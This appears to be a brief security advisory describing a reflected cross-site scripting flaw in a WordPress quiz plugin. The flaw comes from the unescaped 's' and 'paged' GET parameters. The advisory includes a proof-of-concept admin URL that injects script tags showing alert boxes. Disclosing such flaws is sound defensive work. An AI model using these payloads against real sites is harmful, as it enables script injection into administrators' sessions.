The plugin does not sanitise or escape the ‘s’ and paged GET parameter before outputting them in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?page=mlw_quiz_list&s="><script>alert(/XSS-s/)</script>&paged="><script>alert(/XSS-paged/)</script>